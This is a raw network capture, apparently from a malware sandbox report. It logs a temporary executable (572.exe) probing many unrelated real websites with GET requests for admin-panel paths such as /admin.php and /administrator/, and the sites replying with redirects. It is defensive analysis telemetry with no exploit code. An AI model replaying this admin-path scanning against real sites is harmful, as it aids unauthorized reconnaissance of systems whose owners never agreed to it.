                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.426367044 CET658INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://loopex.io/admin.php
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0G%2FnINbR5OgAuL9jZ%2FU6T432yfhjaGC0S%2F8lITvDOgS9FPe4WDF9RqtlshEUCRusoNLjpiphZRC76qfivJ1knTqA84pTTre39nWoP1Y2oPm%2BYBYPYQujPn23iT8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6efd52b0ee-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                193192.168.2.6557058.45.52.14880524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.302058935 CET177OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: genshin.mihoyo.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.453375101 CET613INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: Tuser
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 262
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://genshin.mihoyo.com/admin.php
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Via: ens-cache10.us19[,0]
                                                                                                                                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                EagleId: 082d349e17071316914171209e
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 68 61 73 20 62 65 65 6e 20 61 73 73 69 67 6e 65 64 20 61 20 6e 65 77 20 70 65 72 6d 61 6e 65 6e 74 20 55 52 49 2e 3c 2f 70 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>301 Moved Permanently</h1><p>The requested resource has been assigned a new permanent URI.</p><hr/>Powered by Tuser</body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                194192.168.2.655739184.25.164.10380524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.302063942 CET181OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: store.steampowered.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.478328943 CET346INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 138
                                                                                                                                                                                                                                                                                                                                                                Location: https://store.steampowered.com/admin.php
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                195192.168.2.655740142.250.105.8480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.302063942 CET174OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.429114103 CET479INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/admin
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 179
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.429150105 CET179INData Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e c5 92 de 4d bd 96 18 d0 1a 6b 41 11 24 87 f6 18 62 30 82 31 a2 b1 d0 bf 6f 4c 7b ec 5c 96 9d 1d 86 b7 a4 e2 4d 4d 23 52 b1 ac f0 83 df 79 cd 68 63 5f aa 07 ae cc 62 57 b1 8e d3 9b e0 ef
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m0D~MkA$b01oL{\MM#Ryhc_bW!"mS96F\+h9A2Ee`,xvT,7V"8:_$8!


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                196192.168.2.6557533.163.115.8680524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.310602903 CET172OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: connect.appen.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.412163973 CET572INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://connect.appen.com/admin
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 392ae56b81ecdd89977a6262a9d12eb2.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL58-P9
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: xw-4FBe98BkkUUA-3werhjEB84VkVz9ulBHde-I8ebMTCobNoDB14w==
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.722742081 CET572INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://connect.appen.com/admin
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 392ae56b81ecdd89977a6262a9d12eb2.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL58-P9
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: xw-4FBe98BkkUUA-3werhjEB84VkVz9ulBHde-I8ebMTCobNoDB14w==
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                197192.168.2.655707200.108.110.16480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.329525948 CET187OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: midetuvelocidad.claro.com.pe
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.514595985 CET417INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:15 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=45
                                                                                                                                                                                                                                                                                                                                                                Location: https://midetuvelocidad.claro.com.pe/admin.php?
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                198192.168.2.655395172.66.40.8880524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.347698927 CET179OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: warriorplus.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.645008087 CET1145INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://warriorplus.com:443/administrator/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=X8%2B2JnmctytTad%2BDX5gVIRkMW3kuW4lO6oS%2BgHg2yVdlRSDcshRqbI1lZjYnDkQxvr28h6CS%2BBl84CeB52B7GcwQ1pd8m%2BRoVNdgiocqcvgIVpSWYX2dD92l3yKIa16EcQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6f3afb6787-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 31 66 33 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 73 63 72 69 70 74 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 63 6c 6f 75 64 66 6c 61 72 65 69 6e 73 69 67 68 74 73 2e 63 6f 6d 2f 62 65 61 63 6f 6e 2e 6d 69 6e 2e 6a 73 2f 76 38 34 61 33 61 34 30 31 32 64 65 39 34 63 65 31 61 36 38 36 62 61 38 63 31 36 37 63 33 35 39 63 31 36 39 36 39 37 33 38 39 33 33 31 37 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 65 75 6f 46 47 6f 77 68 6c 61 4c 71 58 73 50 57 51 34 38 71 53 6b 42 53 43 46 73 33 44 50 52 79 69 77 56 75 33 46 6a 52 39 36 63 4d 50 78 2b 46 72 2b 67 70 57 52 68 49 61 66 63 48 77 71 77 43 71 57 53 34 32 52 5a 68 49 75 64 4f 76 45 49 2b 43 6b 66 36 4d 41 3d 3d 22 20 64 61 74 61 2d 63 66 2d 62 65 61 63 6f 6e 3d 27 7b 22 72 61 79 49 64 22 3a 22 38 35 30 61 62 62 36 66 33 61 66 62 36 37 38 37 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 32 30 32 34 2e 32 2e 30 22 2c 22 74 6f 6b 65 6e 22 3a 22 35 39 31 35 39 62 35 66 36 62 63 63 34 38 64 31 62 34 32 39 35 62 34 62 61 34 65 64 33 62 30 63 22 7d 27 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1f3<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><script defer src="https://static.cloudflareinsights.com/beacon.min.js/v84a3a4012de94ce1a686ba8c167c359c1696973893317" integrity="sha512-euoFGowhlaLqXsPWQ48qSkBSCFs3DPRyiwVu3FjR96cMPx+Fr+gpWRhIafcHwqwCqWS42RZhIudOvEI+Ckf6MA==" data-cf-beacon='{"rayId":"850abb6f3afb6787","version":"2024.2.0","token":"59159b5f6bcc48d1b4295b4ba4ed3b0c"}' crossorigin="anonymous"></script></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.645024061 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.325644016 CET188OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: warriorplus.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.619038105 CET1158INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://warriorplus.com:443/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=S%2BKchonp0d0zFr0eAa8WOpuU%2FxQqPJz8O1sxVUQFT0sRNOBfgQFsLnjCmrIGN%2Fm0bTNY%2FVJalm3w1oXz0JEZ1CjjFSFa0gWFcBn6qt712VmIc%2Bq%2FSLqrohz%2BaoAuebm0Aw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd43de956787-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 31 66 33 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 73 63 72 69 70 74 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 63 6c 6f 75 64 66 6c 61 72 65 69 6e 73 69 67 68 74 73 2e 63 6f 6d 2f 62 65 61 63 6f 6e 2e 6d 69 6e 2e 6a 73 2f 76 38 34 61 33 61 34 30 31 32 64 65 39 34 63 65 31 61 36 38 36 62 61 38 63 31 36 37 63 33 35 39 63 31 36 39 36 39 37 33 38 39 33 33 31 37 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 65 75 6f 46 47 6f 77 68 6c 61 4c 71 58 73 50 57 51 34 38 71 53 6b 42 53 43 46 73 33 44 50 52 79 69 77 56 75 33 46 6a 52 39 36 63 4d 50 78 2b 46 72 2b 67 70 57 52 68 49 61 66 63 48 77 71 77 43 71 57 53 34 32 52 5a 68 49 75 64 4f 76 45 49 2b 43 6b 66 36 4d 41 3d 3d 22 20 64 61 74 61 2d 63 66 2d 62 65 61 63 6f 6e 3d 27 7b 22 72 61 79 49 64 22 3a 22 38 35 30 61 62 64 34 33 64 65 39 35 36 37 38 37 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 32 30 32 34 2e 32 2e 30 22 2c 22 74 6f 6b 65 6e 22 3a 22 35 39 31 35 39 62 35 66 36 62 63 63 34 38 64 31 62 34 32 39 35 62 34 62 61 34 65 64 33 62 30 63 22 7d 27 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1f3<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><script defer src="https://static.cloudflareinsights.com/beacon.min.js/v84a3a4012de94ce1a686ba8c167c359c1696973893317" integrity="sha512-euoFGowhlaLqXsPWQ48qSkBSCFs3DPRyiwVu3FjR96cMPx+Fr+gpWRhIafcHwqwCqWS42RZhIudOvEI+Ckf6MA==" data-cf-beacon='{"rayId":"850abd43de956787","version":"2024.2.0","token":"59159b5f6bcc48d1b4295b4ba4ed3b0c"}' crossorigin="anonymous"></script></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.619086027 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                199192.168.2.655396195.85.23.9580524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.347703934 CET180OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ro.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.666256905 CET751INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                location: https://ro.bongacams.com/administrator
                                                                                                                                                                                                                                                                                                                                                                x-bc: ded6949
                                                                                                                                                                                                                                                                                                                                                                x-zone: 3-web22
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=RK8vmG9lETn.Xnl7j2tT0ZGWpUSne35Shd6noBC8654-1707131691-1-AeNFRU+pi2Eke44tUtCYz8WlBvPkupl2+xSbR3tPLQOUhxxFZQgtdqhbMCAjUNMNqMxWwmaM/ks2JGJg65bPVb8=; path=/; expires=Mon, 05-Feb-24 11:44:51 GMT; domain=.bongacams.com; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
